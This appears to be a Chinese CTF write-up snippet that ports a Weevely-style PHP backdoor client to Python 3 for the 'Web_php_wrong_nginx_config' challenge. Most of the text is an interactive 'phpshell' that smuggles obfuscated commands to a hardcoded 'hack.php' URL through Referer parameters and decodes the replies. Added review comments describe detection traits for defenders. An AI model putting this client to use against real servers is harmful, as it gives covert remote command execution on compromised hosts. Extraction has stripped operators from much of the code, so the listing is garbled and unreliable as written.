网上的 wp 中关于 Web_php_wrong_nginx_config 的后门代码都是 python2 的（源码来自：《Weevely：一个 PHP 混淆后门的代码分析》 - Phukers Blog）。
以下是转换成python3的版本
# encoding: utf-8
import base64
import string
import urllib.parse
import zlib
from hashlib import md5
from random import randint, choice

import requests
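import re


def choicePart(seq, amount):
    """Pick *amount* distinct elements of *seq* at random positions.

    Elements are returned in the order they were drawn. Prints
    ``Error Input`` and returns ``None`` when *seq* is empty or shorter
    than *amount*; returns an empty list when *amount* is zero or less.
    """
    length = len(seq)
    if length == 0 or length < amount:
        print("Error Input")
        return None
    result = []
    indexes = set()
    while len(result) < amount:
        i = randint(0, length - 1)
        # Redraw on a repeated position so every pick is a distinct element.
        if i not in indexes:
            indexes.add(i)
            result.append(seq[i])
    return result


def randBytesFlow(amount):
    """Return *amount* random bytes.

    Uses ``random``, not ``secrets``: the output is filler data, not key
    material.
    """
    return bytes(randint(0, 255) for _ in range(amount))


def randAlpha(amount):
    """Return a random string of *amount* ASCII letters."""
    return "".join(choice(string.ascii_letters) for _ in range(amount))


def loopXor(text, key):
    """XOR the bytes of *text* with *key*, repeating *key* as needed.

    Applying the function twice with the same key restores the input.
    A repeating short key is obfuscation only; it gives no confidentiality
    against anyone who knows or can guess the key.

    Raises:
        ValueError: if *key* is empty while *text* is not (the index-based
            loop this replaces would never terminate in that case).
    """
    if text and not key:
        raise ValueError("loopXor needs a non-empty key")
    lenKey = len(key)
    return bytes(t ^ key[i % lenKey] for i, t in enumerate(text))


def debugPrint(msg):
    """Print *msg* only when the module-level ``debugging`` flag is truthy."""
    if debugging:
        print(msg)


# config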
# NOTE(review): the page extraction dropped operators and quote characters
# from this listing (for example `debugging False`), so the statements below
# are not runnable as shown. They are kept verbatim; the comments describe
# only what the surviving text shows.
debugging False
# Two short strings, labelled $kh and $kf by the inline comments (presumably
# the names used in the server-side PHP file; confirm against that file).
keyh 42f7 # $kh
keyf e9ac # $kf
# Both halves together are used further down as the repeating XOR key and as
# the delimiter of the response pattern.
xorKey keyh keyf
url http://61.147.171.105:51610/hack.php
defaultLang zh-CN
# Accept-Language templates; each %d is filled with one q-value digit below.
languages [zh-TW;q0.%d, zh-HK;q0.%d, en-US;q0.%d, en;q0.%d]
# NOTE(review): the line that creates the requests session (`sess`) was fused
# onto the end of the comment on the next line by the extraction.
proxies None # {http:http://127.0.0.1:8080} # proxy for debugsess requests.Session()
# generate random Accept-Language only once each session
langTmp choicePart(languages, 3)
# Three distinct digits from 1..9. They are used twice: as the q-value digits
# of the Accept-Language header here, and in the request loop as the positions
# of the Referer query parameters that carry data. For detection this means
# the two headers are correlated on every request of a session.
indexes sorted(choicePart(range(1, 10), 3), reverseTrue)
acceptLang [defaultLang]
for i in range(3):acceptLang.append(langTmp[i] % (indexes[i],))
acceptLangStr ,.join(acceptLang)
debugPrint(acceptLangStr)
# First character of each of the first two Accept-Language entries.
init2Char acceptLang[0][0] acceptLang[1][0] # $i
# Three hex characters of an MD5 over init2Char combined with each key half
# mark the start and the end of the data; the tail is followed by 3 to 8
# random letters.
md5head (md5((init2Char keyh).encode(utf-8)).hexdigest())[0:3]
md5tail (md5((init2Char keyf).encode(utf-8)).hexdigest())[0:3] randAlpha(randint(3, 8))
debugPrint($i is %s % (init2Char,))
debugPrint(md5 head: %s % (md5head,))
debugPrint(md5 tail: %s % (md5tail,))
# Interactive php shell
cmd input(phpshell )
# NOTE(review): the whole request loop was collapsed onto one line and lost
# its operators, quotes and probably the angle brackets of the response
# pattern, so it is kept verbatim rather than rewritten.
#
# What the visible text shows, per loop iteration:
#   * a list of query parameters with random 3-6 letter names and
#     base64url-encoded random bytes as values is built;
#   * the typed text is zlib-compressed, XORed with xorKey via loopXor,
#     base64url-encoded and prefixed with md5head;
#   * that string is cut in two at a random offset, and the two pieces plus
#     md5tail overwrite the parameter values at the positions in `indexes`;
#   * one GET goes to `url` with that query string as the Referer (the Referer
#     names the requested URL itself) and the session's Accept-Language value;
#   * the reply is searched with a pattern built from xorKey, and the match is
#     base64-decoded, XORed with the same key and zlib-decompressed.
#
# Review points for defenders: the transform is a static repeating-key XOR
# over compressed data, so anyone holding the two key halves from the
# server-side file can decode captured requests and replies. The request
# shape (self-referencing Referer whose query is short random names with
# base64url values, paired with the Accept-Language q-value digits described
# above) is what distinguishes this traffic in web-server logs.
while cmd ! :# build junk data in refererquery []for i in range(max(indexes) 1 randint(0, 2)):key randAlpha(randint(3, 6))value base64.urlsafe_b64encode(randBytesFlow(randint(3, 12))).decode(utf-8)query.append((key, value))debugPrint(Before insert payload:)debugPrint(query)debugPrint(urllib.parse.urlencode(query))# encode payloadpayload zlib.compress(cmd.encode(utf-8))payload loopXor(payload, xorKey.encode(utf-8))payload base64.urlsafe_b64encode(payload).decode(utf-8)payload md5head payload# cut payload, replace into referercutIndex randint(2, len(payload) - 3)payloadPieces (payload[0:cutIndex], payload[cutIndex:], md5tail)iPiece 0for i in indexes:query[i] (query[i][0], payloadPieces[iPiece])iPiece 1referer url ? urllib.parse.urlencode(query)debugPrint(After insert payload, referer is:)debugPrint(query)debugPrint(referer)# send requestr sess.get(url, headers{Accept-Language: acceptLangStr, Referer: referer}, proxiesproxies)html r.textdebugPrint(html)# process responsepattern re.compile(r%s(.*)/%s % (xorKey, xorKey))output pattern.findall(html)if len(output) 0:print(Error, no backdoor response)cmd input(phpshell )continueoutput output[0]debugPrint(output)output base64.b64decode(output.encode(utf-8))output loopXor(output, xorKey.encode(utf-8))output zlib.decompress(output).decode(utf-8)print(output)cmd input(phpshell )